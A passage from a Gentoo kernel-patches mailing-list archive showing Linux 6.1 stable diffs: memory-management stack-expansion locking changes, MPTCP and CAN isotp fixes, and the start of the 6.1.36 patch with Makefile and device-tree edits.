+ 	return expand_downwards(vma, address);
+ }
+ 
+-struct vm_area_struct *
+-find_extend_vma(struct mm_struct *mm, unsigned long addr)
++struct vm_area_struct *find_extend_vma_locked(struct mm_struct *mm, unsigned long addr)
+ {
+ 	struct vm_area_struct *vma;
+ 	unsigned long start;
+@@ -2170,10 +2177,8 @@ find_extend_vma(struct mm_struct *mm, unsigned long addr)
+ 		return NULL;
+ 	if (vma->vm_start <= addr)
+ 		return vma;
+-	if (!(vma->vm_flags & VM_GROWSDOWN))
+-		return NULL;
+ 	start = vma->vm_start;
+-	if (expand_stack(vma, addr))
++	if (expand_stack_locked(vma, addr))
+ 		return NULL;
+ 	if (vma->vm_flags & VM_LOCKED)
+ 		populate_vma_page_range(vma, addr, start, NULL);
+@@ -2181,7 +2186,91 @@ find_extend_vma(struct mm_struct *mm, unsigned long addr)
+ }
+ #endif
+ 
+-EXPORT_SYMBOL_GPL(find_extend_vma);
++/*
++ * IA64 has some horrid mapping rules: it can expand both up and down,
++ * but with various special rules.
++ *
++ * We'll get rid of this architecture eventually, so the ugliness is
++ * temporary.
++ */
++#ifdef CONFIG_IA64
++static inline bool vma_expand_ok(struct vm_area_struct *vma, unsigned long addr)
++{
++	return REGION_NUMBER(addr) == REGION_NUMBER(vma->vm_start) &&
++		REGION_OFFSET(addr) < RGN_MAP_LIMIT;
++}
++
++/*
++ * IA64 stacks grow down, but there's a special register backing store
++ * that can grow up. Only sequentially, though, so the new address must
++ * match vm_end.
++ */
++static inline int vma_expand_up(struct vm_area_struct *vma, unsigned long addr)
++{
++	if (!vma_expand_ok(vma, addr))
++		return -EFAULT;
++	if (vma->vm_end != (addr & PAGE_MASK))
++		return -EFAULT;
++	return expand_upwards(vma, addr);
++}
++
++static inline bool vma_expand_down(struct vm_area_struct *vma, unsigned long addr)
++{
++	if (!vma_expand_ok(vma, addr))
++		return -EFAULT;
++	return expand_downwards(vma, addr);
++}
++
++#elif defined(CONFIG_STACK_GROWSUP)
++
++#define vma_expand_up(vma,addr) expand_upwards(vma, addr)
++#define vma_expand_down(vma, addr) (-EFAULT)
++
++#else
++
++#define vma_expand_up(vma,addr) (-EFAULT)
++#define vma_expand_down(vma, addr) expand_downwards(vma, addr)
++
++#endif
++
++/*
++ * expand_stack(): legacy interface for page faulting. Don't use unless
++ * you have to.
++ *
++ * This is called with the mm locked for reading, drops the lock, takes
++ * the lock for writing, tries to look up a vma again, expands it if
++ * necessary, and downgrades the lock to reading again.
++ *
++ * If no vma is found or it can't be expanded, it returns NULL and has
++ * dropped the lock.
++ */
++struct vm_area_struct *expand_stack(struct mm_struct *mm, unsigned long addr)
++{
++	struct vm_area_struct *vma, *prev;
++
++	mmap_read_unlock(mm);
++	if (mmap_write_lock_killable(mm))
++		return NULL;
++
++	vma = find_vma_prev(mm, addr, &prev);
++	if (vma && vma->vm_start <= addr)
++		goto success;
++
++	if (prev && !vma_expand_up(prev, addr)) {
++		vma = prev;
++		goto success;
++	}
++
++	if (vma && !vma_expand_down(vma, addr))
++		goto success;
++
++	mmap_write_unlock(mm);
++	return NULL;
++
++success:
++	mmap_write_downgrade(mm);
++	return vma;
++}
+ 
+ /*
+  * Ok - we have the memory areas we should free on a maple tree so release them,
+@@ -2311,19 +2400,6 @@ int split_vma(struct mm_struct *mm, struct vm_area_struct *vma,
+ 	return __split_vma(mm, vma, addr, new_below);
+ }
+ 
+-static inline int munmap_sidetree(struct vm_area_struct *vma,
+-				   struct ma_state *mas_detach)
+-{
+-	mas_set_range(mas_detach, vma->vm_start, vma->vm_end - 1);
+-	if (mas_store_gfp(mas_detach, vma, GFP_KERNEL))
+-		return -ENOMEM;
+-
+-	if (vma->vm_flags & VM_LOCKED)
+-		vma->vm_mm->locked_vm -= vma_pages(vma);
+-
+-	return 0;
+-}
+-
+ /*
+  * do_mas_align_munmap() - munmap the aligned region from @start to @end.
+  * @mas: The maple_state, ideally set up to alter the correct tree location.
+@@ -2345,6 +2421,7 @@ do_mas_align_munmap(struct ma_state *mas, struct vm_area_struct *vma,
+ 	struct maple_tree mt_detach;
+ 	int count = 0;
+ 	int error = -ENOMEM;
++	unsigned long locked_vm = 0;
+ 	MA_STATE(mas_detach, &mt_detach, 0, 0);
+ 	mt_init_flags(&mt_detach, mas->tree->ma_flags & MT_FLAGS_LOCK_MASK);
+ 	mt_set_external_lock(&mt_detach, &mm->mmap_lock);
+@@ -2403,18 +2480,24 @@ do_mas_align_munmap(struct ma_state *mas, struct vm_area_struct *vma,
+ 
+ 			mas_set(mas, end);
+ 			split = mas_prev(mas, 0);
+-			error = munmap_sidetree(split, &mas_detach);
++			mas_set_range(&mas_detach, split->vm_start, split->vm_end - 1);
++			error = mas_store_gfp(&mas_detach, split, GFP_KERNEL);
+ 			if (error)
+-				goto munmap_sidetree_failed;
++				goto munmap_gather_failed;
++			if (next->vm_flags & VM_LOCKED)
++				locked_vm += vma_pages(split);
+ 
+ 			count++;
+ 			if (vma == next)
+ 				vma = split;
+ 			break;
+ 		}
+-		error = munmap_sidetree(next, &mas_detach);
++		mas_set_range(&mas_detach, next->vm_start, next->vm_end - 1);
++		error = mas_store_gfp(&mas_detach, next, GFP_KERNEL);
+ 		if (error)
+-			goto munmap_sidetree_failed;
++			goto munmap_gather_failed;
++		if (next->vm_flags & VM_LOCKED)
++			locked_vm += vma_pages(next);
+ 
+ 		count++;
+ #ifdef CONFIG_DEBUG_VM_MAPLE_TREE
+@@ -2463,7 +2546,10 @@ do_mas_align_munmap(struct ma_state *mas, struct vm_area_struct *vma,
+ 		mas_set_range(mas, start, end - 1);
+ 	}
+ #endif
++	/* Point of no return */
+ 	mas_store_prealloc(mas, NULL);
++
++	mm->locked_vm -= locked_vm;
+ 	mm->map_count -= count;
+ 	/*
+ 	 * Do not downgrade mmap_lock if we are next to VM_GROWSDOWN or
+@@ -2490,7 +2576,7 @@ do_mas_align_munmap(struct ma_state *mas, struct vm_area_struct *vma,
+ 	return downgrade ? 1 : 0;
+ 
+ userfaultfd_error:
+-munmap_sidetree_failed:
++munmap_gather_failed:
+ end_split_failed:
+ 	__mt_destroy(&mt_detach);
+ start_split_failed:
+diff --git a/mm/nommu.c b/mm/nommu.c
+index 5b83938ecb67c..da26b3fec9ebe 100644
+--- a/mm/nommu.c
++++ b/mm/nommu.c
+@@ -682,23 +682,31 @@ struct vm_area_struct *find_vma(struct mm_struct *mm, unsigned long addr)
+ EXPORT_SYMBOL(find_vma);
+ 
+ /*
+- * find a VMA
+- * - we don't extend stack VMAs under NOMMU conditions
++ * At least xtensa ends up having protection faults even with no
++ * MMU.. No stack expansion, at least.
+  */
+-struct vm_area_struct *find_extend_vma(struct mm_struct *mm, unsigned long addr)
++struct vm_area_struct *lock_mm_and_find_vma(struct mm_struct *mm,
++			unsigned long addr, struct pt_regs *regs)
+ {
+-	return find_vma(mm, addr);
++	mmap_read_lock(mm);
++	return vma_lookup(mm, addr);
+ }
+ 
+ /*
+  * expand a stack to a given address
+  * - not supported under NOMMU conditions
+  */
+-int expand_stack(struct vm_area_struct *vma, unsigned long address)
++int expand_stack_locked(struct vm_area_struct *vma, unsigned long addr)
+ {
+ 	return -ENOMEM;
+ }
+ 
++struct vm_area_struct *expand_stack(struct mm_struct *mm, unsigned long addr)
++{
++	mmap_read_unlock(mm);
++	return NULL;
++}
++
+ /*
+  * look up the first VMA exactly that exactly matches addr
+  * - should be called with mm->mmap_lock at least held readlocked
+diff --git a/net/can/isotp.c b/net/can/isotp.c
+index 1af623839bffa..b3c2a49b189cc 100644
+--- a/net/can/isotp.c
++++ b/net/can/isotp.c
+@@ -1079,8 +1079,9 @@ wait_free_buffer:
+ 		if (err)
+ 			goto err_event_drop;
+ 
+-		if (sk->sk_err)
+-			return -sk->sk_err;
++		err = sock_error(sk);
++		if (err)
++			return err;
+ 	}
+ 
+ 	return size;
+diff --git a/net/mptcp/pm_netlink.c b/net/mptcp/pm_netlink.c
+index 01d34ee4525ea..9127a7fd5269c 100644
+--- a/net/mptcp/pm_netlink.c
++++ b/net/mptcp/pm_netlink.c
+@@ -1039,6 +1039,7 @@ static int mptcp_pm_nl_create_listen_socket(struct sock *sk,
+ 		return err;
+ 	}
+ 
++	inet_sk_state_store(newsk, TCP_LISTEN);
+ 	err = kernel_listen(ssock, backlog);
+ 	if (err) {
+ 		pr_warn("kernel_listen error, err=%d", err);
+diff --git a/net/mptcp/protocol.c b/net/mptcp/protocol.c
+index a2c6ce40e4269..4ca61e80f4bb2 100644
+--- a/net/mptcp/protocol.c
++++ b/net/mptcp/protocol.c
+@@ -2400,12 +2400,6 @@ static void __mptcp_close_ssk(struct sock *sk, struct sock *ssk,
+ 		kfree_rcu(subflow, rcu);
+ 	} else {
+ 		/* otherwise tcp will dispose of the ssk and subflow ctx */
+-		if (ssk->sk_state == TCP_LISTEN) {
+-			tcp_set_state(ssk, TCP_CLOSE);
+-			mptcp_subflow_queue_clean(sk, ssk);
+-			inet_csk_listen_stop(ssk);
+-		}
+-
+ 		__tcp_close(ssk, 0);
+ 
+ 		/* close acquired an extra ref */
+@@ -2939,6 +2933,24 @@ static __poll_t mptcp_check_readable(struct mptcp_sock *msk)
+ 	return EPOLLIN | EPOLLRDNORM;
+ }
+ 
++static void mptcp_check_listen_stop(struct sock *sk)
++{
++	struct sock *ssk;
++
++	if (inet_sk_state_load(sk) != TCP_LISTEN)
++		return;
++
++	ssk = mptcp_sk(sk)->first;
++	if (WARN_ON_ONCE(!ssk || inet_sk_state_load(ssk) != TCP_LISTEN))
++		return;
++
++	lock_sock_nested(ssk, SINGLE_DEPTH_NESTING);
++	mptcp_subflow_queue_clean(sk, ssk);
++	inet_csk_listen_stop(ssk);
++	tcp_set_state(ssk, TCP_CLOSE);
++	release_sock(ssk);
++}
++
+ bool __mptcp_close(struct sock *sk, long timeout)
+ {
+ 	struct mptcp_subflow_context *subflow;
+@@ -2949,6 +2961,7 @@ bool __mptcp_close(struct sock *sk, long timeout)
+ 	WRITE_ONCE(sk->sk_shutdown, SHUTDOWN_MASK);
+ 
+ 	if ((1 << sk->sk_state) & (TCPF_LISTEN | TCPF_CLOSE)) {
++		mptcp_check_listen_stop(sk);
+ 		inet_sk_state_store(sk, TCP_CLOSE);
+ 		goto cleanup;
+ 	}
+@@ -3062,6 +3075,7 @@ static int mptcp_disconnect(struct sock *sk, int flags)
+ 	if (msk->fastopening)
+ 		return -EBUSY;
+ 
++	mptcp_check_listen_stop(sk);
+ 	inet_sk_state_store(sk, TCP_CLOSE);
+ 
+ 	mptcp_stop_timer(sk);


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-06-28 10:26 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-06-28 10:26 UTC (permalink / raw
  To: gentoo-commits

commit:     160c13fbc256840a316128f9b8601a317de1ea39
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed Jun 28 10:26:02 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed Jun 28 10:26:02 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=160c13fb

Linux patch 6.1.36

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |      4 +
 1035_linux-6.1.36.patch | 231726 +++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 231730 insertions(+)

diff --git a/0000_README b/0000_README
index 077b20d6..46c23470 100644
--- a/0000_README
+++ b/0000_README
@@ -183,6 +183,10 @@ Patch:  1034_linux-6.1.35.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.35
 
+Patch:  1035_linux-6.1.36.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.36
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1035_linux-6.1.36.patch b/1035_linux-6.1.36.patch
new file mode 100644
index 00000000..1e6d88ca
--- /dev/null
+++ b/1035_linux-6.1.36.patch
@@ -0,0 +1,231726 @@
+diff --git a/MAINTAINERS b/MAINTAINERS
+index 301b9ba6af79f..379387e20a96d 100644
+--- a/MAINTAINERS
++++ b/MAINTAINERS
+@@ -5183,8 +5183,8 @@ S:	Supported
+ W:	https://wiki.samba.org/index.php/LinuxCIFS
+ T:	git git://git.samba.org/sfrench/cifs-2.6.git
+ F:	Documentation/admin-guide/cifs/
+-F:	fs/cifs/
+-F:	fs/smbfs_common/
++F:	fs/smb/client/
++F:	fs/smb/common/
+ F:	include/uapi/linux/cifs
+ 
+ COMPACTPCI HOTPLUG CORE
+@@ -11168,8 +11168,8 @@ L:	linux-cifs@vger.kernel.org
+ S:	Maintained
+ T:	git git://git.samba.org/ksmbd.git
+ F:	Documentation/filesystems/cifs/ksmbd.rst
+-F:	fs/ksmbd/
+-F:	fs/smbfs_common/
++F:	fs/smb/common/
++F:	fs/smb/server/
+ 
+ KERNEL UNIT TESTING FRAMEWORK (KUnit)
+ M:	Brendan Higgins <brendanhiggins@google.com>
+diff --git a/Makefile b/Makefile
+index 46c06af912d9d..cffb83d7a0fb6 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 35
++SUBLEVEL = 36
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm/boot/dts/am57xx-cl-som-am57x.dts b/arch/arm/boot/dts/am57xx-cl-som-am57x.dts
+index 2fc9a5d5e0c0d..625b9b311b49d 100644
+--- a/arch/arm/boot/dts/am57xx-cl-som-am57x.dts
++++ b/arch/arm/boot/dts/am57xx-cl-som-am57x.dts
+@@ -527,7 +527,7 @@
+ 
+ 		interrupt-parent = <&gpio1>;
+ 		interrupts = <31 0>;
+-		pendown-gpio = <&gpio1 31 0>;
++		pendown-gpio = <&gpio1 31 GPIO_ACTIVE_LOW>;
+ 
+ 
+ 		ti,x-min = /bits/ 16 <0x0>;
+diff --git a/arch/arm/boot/dts/at91sam9261ek.dts b/arch/arm/boot/dts/at91sam9261ek.dts
+index 88869ca874d1a..045cb253f23a6 100644
+--- a/arch/arm/boot/dts/at91sam9261ek.dts
++++ b/arch/arm/boot/dts/at91sam9261ek.dts
+@@ -156,7 +156,7 @@
+ 					compatible = "ti,ads7843";
+ 					interrupts-extended = <&pioC 2 IRQ_TYPE_EDGE_BOTH>;
+ 					spi-max-frequency = <3000000>;
+-					pendown-gpio = <&pioC 2 GPIO_ACTIVE_HIGH>;
++					pendown-gpio = <&pioC 2 GPIO_ACTIVE_LOW>;
+ 
+ 					ti,x-min = /bits/ 16 <150>;
+ 					ti,x-max = /bits/ 16 <3830>;
+diff --git a/arch/arm/boot/dts/imx7d-pico-hobbit.dts b/arch/arm/boot/dts/imx7d-pico-hobbit.dts
+index d917dc4f2f227..6ad39dca70096 100644
+--- a/arch/arm/boot/dts/imx7d-pico-hobbit.dts
++++ b/arch/arm/boot/dts/imx7d-pico-hobbit.dts
+@@ -64,7 +64,7 @@
+ 		interrupt-parent = <&gpio2>;
+ 		interrupts = <7 0>;
+ 		spi-max-frequency = <1000000>;
+-		pendown-gpio = <&gpio2 7 0>;
++		pendown-gpio = <&gpio2 7 GPIO_ACTIVE_LOW>;
+ 		vcc-supply = <&reg_3p3v>;
+ 		ti,x-min = /bits/ 16 <0>;
+ 		ti,x-max = /bits/ 16 <4095>;
+diff --git a/arch/arm/boot/dts/imx7d-sdb.dts b/arch/arm/boot/dts/imx7d-sdb.dts
+index f483bc0afe5ea..234e5fc647b22 100644
+--- a/arch/arm/boot/dts/imx7d-sdb.dts
++++ b/arch/arm/boot/dts/imx7d-sdb.dts
+@@ -205,7 +205,7 @@
+ 		pinctrl-0 = <&pinctrl_tsc2046_pendown>;
+ 		interrupt-parent = <&gpio2>;
+ 		interrupts = <29 0>;
+-		pendown-gpio = <&gpio2 29 GPIO_ACTIVE_HIGH>;
++		pendown-gpio = <&gpio2 29 GPIO_ACTIVE_LOW>;
+ 		touchscreen-max-pressure = <255>;
+ 		wakeup-source;
+ 	};
+diff --git a/arch/arm/boot/dts/omap3-cm-t3x.dtsi b/arch/arm/boot/dts/omap3-cm-t3x.dtsi
+index e61b8a2bfb7de..51baedf1603bd 100644
+--- a/arch/arm/boot/dts/omap3-cm-t3x.dtsi
++++ b/arch/arm/boot/dts/omap3-cm-t3x.dtsi
+@@ -227,7 +227,7 @@
+ 
+ 		interrupt-parent = <&gpio2>;
+ 		interrupts = <25 0>;		/* gpio_57 */
+-		pendown-gpio = <&gpio2 25 GPIO_ACTIVE_HIGH>;
++		pendown-gpio = <&gpio2 25 GPIO_ACTIVE_LOW>;
+ 
+ 		ti,x-min = /bits/ 16 <0x0>;
+ 		ti,x-max = /bits/ 16 <0x0fff>;
+diff --git a/arch/arm/boot/dts/omap3-devkit8000-lcd-common.dtsi b/arch/arm/boot/dts/omap3-devkit8000-lcd-common.dtsi
+index 3decc2d78a6ca..a7f99ae0c1fe9 100644
+--- a/arch/arm/boot/dts/omap3-devkit8000-lcd-common.dtsi
++++ b/arch/arm/boot/dts/omap3-devkit8000-lcd-common.dtsi
+@@ -54,7 +54,7 @@
+ 
+ 		interrupt-parent = <&gpio1>;
+ 		interrupts = <27 0>;		/* gpio_27 */
+-		pendown-gpio = <&gpio1 27 GPIO_ACTIVE_HIGH>;
++		pendown-gpio = <&gpio1 27 GPIO_ACTIVE_LOW>;
+ 
+ 		ti,x-min = /bits/ 16 <0x0>;
+ 		ti,x-max = /bits/ 16 <0x0fff>;
+diff --git a/arch/arm/boot/dts/omap3-lilly-a83x.dtsi b/arch/arm/boot/dts/omap3-lilly-a83x.dtsi
+index c595afe4181d7..d310b5c7bac36 100644
+--- a/arch/arm/boot/dts/omap3-lilly-a83x.dtsi
++++ b/arch/arm/boot/dts/omap3-lilly-a83x.dtsi
+@@ -311,7 +311,7 @@
+ 		interrupt-parent = <&gpio1>;
+ 		interrupts = <8 0>;   /* boot6 / gpio_8 */
+ 		spi-max-frequency = <1000000>;
+-		pendown-gpio = <&gpio1 8 GPIO_ACTIVE_HIGH>;
++		pendown-gpio = <&gpio1 8 GPIO_ACTIVE_LOW>;
+ 		vcc-supply = <&reg_vcc3>;
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&tsc2048_pins>;
+diff --git a/arch/arm/boot/dts/omap3-overo-common-lcd35.dtsi b/arch/arm/boot/dts/omap3-overo-common-lcd35.dtsi
+index 1d6e88f99eb31..c3570acc35fad 100644
+--- a/arch/arm/boot/dts/omap3-overo-common-lcd35.dtsi
++++ b/arch/arm/boot/dts/omap3-overo-common-lcd35.dtsi
+@@ -149,7 +149,7 @@
+ 
+ 		interrupt-parent = <&gpio4>;
+ 		interrupts = <18 0>;			/* gpio_114 */
+-		pendown-gpio = <&gpio4 18 GPIO_ACTIVE_HIGH>;
++		pendown-gpio = <&gpio4 18 GPIO_ACTIVE_LOW>;
+ 
+ 		ti,x-min = /bits/ 16 <0x0>;
+ 		ti,x-max = /bits/ 16 <0x0fff>;
+diff --git a/arch/arm/boot/dts/omap3-overo-common-lcd43.dtsi b/arch/arm/boot/dts/omap3-overo-common-lcd43.dtsi
+index 7e30f9d45790e..d95a0e130058c 100644
+--- a/arch/arm/boot/dts/omap3-overo-common-lcd43.dtsi
++++ b/arch/arm/boot/dts/omap3-overo-common-lcd43.dtsi
+@@ -160,7 +160,7 @@
+ 
+ 		interrupt-parent = <&gpio4>;
+ 		interrupts = <18 0>;			/* gpio_114 */
+-		pendown-gpio = <&gpio4 18 GPIO_ACTIVE_HIGH>;
++		pendown-gpio = <&gpio4 18 GPIO_ACTIVE_LOW>;
+ 
+ 		ti,x-min = /bits/ 16 <0x0>;
+ 		ti,x-max = /bits/ 16 <0x0fff>;
+diff --git a/arch/arm/boot/dts/omap3-pandora-common.dtsi b/arch/arm/boot/dts/omap3-pandora-common.dtsi
+index 559853764487f..4c3b6bab179cc 100644
+--- a/arch/arm/boot/dts/omap3-pandora-common.dtsi
++++ b/arch/arm/boot/dts/omap3-pandora-common.dtsi
+@@ -651,7 +651,7 @@
+ 		pinctrl-0 = <&penirq_pins>;
+ 		interrupt-parent = <&gpio3>;
+ 		interrupts = <30 IRQ_TYPE_NONE>;	/* GPIO_94 */
+-		pendown-gpio = <&gpio3 30 GPIO_ACTIVE_HIGH>;
++		pendown-gpio = <&gpio3 30 GPIO_ACTIVE_LOW>;
+ 		vcc-supply = <&vaux4>;
+ 
+ 		ti,x-min = /bits/ 16 <0>;
+diff --git a/arch/arm/boot/dts/omap5-cm-t54.dts b/arch/arm/boot/dts/omap5-cm-t54.dts
+index ca759b7b8a580..e62ea8b6d53fd 100644
+--- a/arch/arm/boot/dts/omap5-cm-t54.dts
++++ b/arch/arm/boot/dts/omap5-cm-t54.dts
+@@ -354,7 +354,7 @@
+ 
+ 		interrupt-parent = <&gpio1>;
+ 		interrupts = <15 0>;			/* gpio1_wk15 */
+-		pendown-gpio = <&gpio1 15 GPIO_ACTIVE_HIGH>;
++		pendown-gpio = <&gpio1 15 GPIO_ACTIVE_LOW>;
+ 
+ 
+ 		ti,x-min = /bits/ 16 <0x0>;
+diff --git a/arch/arm64/boot/dts/qcom/sc7280-idp.dtsi b/arch/arm64/boot/dts/qcom/sc7280-idp.dtsi
+index ca50f0ba9b815..1c370dcfe60b9 100644
+--- a/arch/arm64/boot/dts/qcom/sc7280-idp.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc7280-idp.dtsi
+@@ -488,7 +488,6 @@
+ 	wcd_rx: codec@0,4 {
+ 		compatible = "sdw20217010d00";
+ 		reg = <0 4>;
+-		#sound-dai-cells = <1>;
+ 		qcom,rx-port-mapping = <1 2 3 4 5>;
+ 	};
+ };
+@@ -499,7 +498,6 @@
+ 	wcd_tx: codec@0,3 {
+ 		compatible = "sdw20217010d00";
+ 		reg = <0 3>;
+-		#sound-dai-cells = <1>;
+ 		qcom,tx-port-mapping = <1 2 3 4>;
+ 	};
+ };
+diff --git a/arch/arm64/boot/dts/qcom/sc7280-qcard.dtsi b/arch/arm64/boot/dts/qcom/sc7280-qcard.dtsi
+index f7665b3799233..c358abc052eb8 100644
+--- a/arch/arm64/boot/dts/qcom/sc7280-qcard.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc7280-qcard.dtsi
+@@ -418,7 +418,6 @@
+ 	wcd_rx: codec@0,4 {
+ 		compatible = "sdw20217010d00";
+ 		reg = <0 4>;
+-		#sound-dai-cells = <1>;
+ 		qcom,rx-port-mapping = <1 2 3 4 5>;
+ 	};
+ };
+@@ -427,7 +426,6 @@
+ 	wcd_tx: codec@0,3 {
+ 		compatible = "sdw20217010d00";
+ 		reg = <0 3>;
+-		#sound-dai-cells = <1>;
+ 		qcom,tx-port-mapping = <1 2 3 4>;
+ 	};
+ };
+diff --git a/arch/arm64/boot/dts/rockchip/rk3566-soquartz-cm4.dts b/arch/arm64/boot/dts/rockchip/rk3566-soquartz-cm4.dts
+index e00568a6be5cc..6ba562b922e6c 100644
+--- a/arch/arm64/boot/dts/rockchip/rk3566-soquartz-cm4.dts
++++ b/arch/arm64/boot/dts/rockchip/rk3566-soquartz-cm4.dts
+@@ -28,6 +28,16 @@
+ 		regulator-max-microvolt = <5000000>;
+ 		vin-supply = <&vcc12v_dcin>;
+ 	};
++
++	vcc_sd_pwr: vcc-sd-pwr-regulator {
++		compatible = "regulator-fixed";
++		regulator-name = "vcc_sd_pwr";
++		regulator-always-on;
++		regulator-boot-on;
++		regulator-min-microvolt = <3300000>;
++		regulator-max-microvolt = <3300000>;
++		vin-supply = <&vcc3v3_sys>;
++	};
+ };
+ 
+ &gmac1 {
+@@ -119,13 +129,7 @@
+ };
+ 
+ &sdmmc0 {
+-	vmmc-supply = <&sdmmc_pwr>;
+-	status = "okay";
+-};
+-
+-&sdmmc_pwr {
+-	regulator-min-microvolt = <3300000>;
+-	regulator-max-microvolt = <3300000>;
++	vmmc-supply = <&vcc_sd_pwr>;
+ 	status = "okay";
+ };
+ 
+diff --git a/arch/arm64/boot/dts/rockchip/rk3566-soquartz.dtsi b/arch/arm64/boot/dts/rockchip/rk3566-soquartz.dtsi
+index 4d494b53a71ab..ba56ca2e66c8d 100644
+--- a/arch/arm64/boot/dts/rockchip/rk3566-soquartz.dtsi
++++ b/arch/arm64/boot/dts/rockchip/rk3566-soquartz.dtsi
+@@ -92,16 +92,6 @@
+ 		regulator-max-microvolt = <3300000>;
+ 		vin-supply = <&vcc5v0_sys>;
+ 	};
+-
+-	sdmmc_pwr: sdmmc-pwr-regulator {
+-		compatible = "regulator-fixed";
+-		enable-active-high;
+-		gpio = <&gpio0 RK_PA5 GPIO_ACTIVE_HIGH>;
+-		pinctrl-names = "default";
+-		pinctrl-0 = <&sdmmc_pwr_h>;
+-		regulator-name = "sdmmc_pwr";
+-		status = "disabled";
+-	};
+ };
+ 
+ &cpu0 {
+@@ -143,6 +133,24 @@
+ 	status = "disabled";
+ };
+ 
++&gpio0 {
++	nextrst-hog {
++		gpio-hog;
++		/*
++		 * GPIO_ACTIVE_LOW + output-low here means that the pin is set
++		 * to high, because output-low decides the value pre-inversion.
++		 */
++		gpios = <RK_PA5 GPIO_ACTIVE_LOW>;
++		line-name = "nEXTRST";
++		output-low;
++	};
++};
++
++&gpu {
++	mali-supply = <&vdd_gpu>;
++	status = "okay";
++};
++
+ &i2c0 {
+ 	status = "okay";
+ 
+@@ -480,12 +488,6 @@
+ 			rockchip,pins = <2 RK_PC2 RK_FUNC_GPIO &pcfg_pull_none>;
+ 		};
+ 	};
+-
+-	sdmmc-pwr {
+-		sdmmc_pwr_h: sdmmc-pwr-h {
+-			rockchip,pins = <0 RK_PA5 RK_FUNC_GPIO &pcfg_pull_none>;
+-		};
+-	};
+ };
+ 
+ &pmu_io_domains {
+diff --git a/arch/arm64/boot/dts/rockchip/rk3568.dtsi b/arch/arm64/boot/dts/rockchip/rk3568.dtsi
+index ba67b58f05b79..f1be76a54ceb0 100644
+--- a/arch/arm64/boot/dts/rockchip/rk3568.dtsi
++++ b/arch/arm64/boot/dts/rockchip/rk3568.dtsi
+@@ -94,9 +94,10 @@
+ 		power-domains = <&power RK3568_PD_PIPE>;
+ 		reg = <0x3 0xc0400000 0x0 0x00400000>,
+ 		      <0x0 0xfe270000 0x0 0x00010000>,
+-		      <0x3 0x7f000000 0x0 0x01000000>;
+-		ranges = <0x01000000 0x0 0x3ef00000 0x3 0x7ef00000 0x0 0x00100000>,
+-			 <0x02000000 0x0 0x00000000 0x3 0x40000000 0x0 0x3ef00000>;
++		      <0x0 0xf2000000 0x0 0x00100000>;
++		ranges = <0x01000000 0x0 0xf2100000 0x0 0xf2100000 0x0 0x00100000>,
++			 <0x02000000 0x0 0xf2200000 0x0 0xf2200000 0x0 0x01e00000>,
++			 <0x03000000 0x0 0x40000000 0x3 0x40000000 0x0 0x40000000>;
+ 		reg-names = "dbi", "apb", "config";
+ 		resets = <&cru SRST_PCIE30X1_POWERUP>;
+ 		reset-names = "pipe";
+@@ -146,9 +147,10 @@
+ 		power-domains = <&power RK3568_PD_PIPE>;
+ 		reg = <0x3 0xc0800000 0x0 0x00400000>,
+ 		      <0x0 0xfe280000 0x0 0x00010000>,
+-		      <0x3 0xbf000000 0x0 0x01000000>;
+-		ranges = <0x01000000 0x0 0x3ef00000 0x3 0xbef00000 0x0 0x00100000>,
+-			 <0x02000000 0x0 0x00000000 0x3 0x80000000 0x0 0x3ef00000>;
++		      <0x0 0xf0000000 0x0 0x00100000>;
++		ranges = <0x01000000 0x0 0xf0100000 0x0 0xf0100000 0x0 0x00100000>,
++			 <0x02000000 0x0 0xf0200000 0x0 0xf0200000 0x0 0x01e00000>,
++			 <0x03000000 0x0 0x40000000 0x3 0x80000000 0x0 0x40000000>;
+ 		reg-names = "dbi", "apb", "config";
+ 		resets = <&cru SRST_PCIE30X2_POWERUP>;
+ 		reset-names = "pipe";
+diff --git a/arch/arm64/boot/dts/rockchip/rk356x.dtsi b/arch/arm64/boot/dts/rockchip/rk356x.dtsi
+index 1d423daae971b..234b5bbda1204 100644
+--- a/arch/arm64/boot/dts/rockchip/rk356x.dtsi
++++ b/arch/arm64/boot/dts/rockchip/rk356x.dtsi
+@@ -951,7 +951,7 @@
+ 		compatible = "rockchip,rk3568-pcie";
+ 		reg = <0x3 0xc0000000 0x0 0x00400000>,
+ 		      <0x0 0xfe260000 0x0 0x00010000>,
+-		      <0x3 0x3f000000 0x0 0x01000000>;
++		      <0x0 0xf4000000 0x0 0x00100000>;
+ 		reg-names = "dbi", "apb", "config";
+ 		interrupts = <GIC_SPI 75 IRQ_TYPE_LEVEL_HIGH>,
+ 			     <GIC_SPI 74 IRQ_TYPE_LEVEL_HIGH>,
+@@ -981,8 +981,9 @@
+ 		phys = <&combphy2 PHY_TYPE_PCIE>;
+ 		phy-names = "pcie-phy";
+ 		power-domains = <&power RK3568_PD_PIPE>;
+-		ranges = <0x01000000 0x0 0x3ef00000 0x3 0x3ef00000 0x0 0x00100000
+-			  0x02000000 0x0 0x00000000 0x3 0x00000000 0x0 0x3ef00000>;
++		ranges = <0x01000000 0x0 0xf4100000 0x0 0xf4100000 0x0 0x00100000>,
++			 <0x02000000 0x0 0xf4200000 0x0 0xf4200000 0x0 0x01e00000>,
++			 <0x03000000 0x0 0x40000000 0x3 0x00000000 0x0 0x40000000>;
+ 		resets = <&cru SRST_PCIE20_POWERUP>;
+ 		reset-names = "pipe";
+ 		#address-cells = <3>;
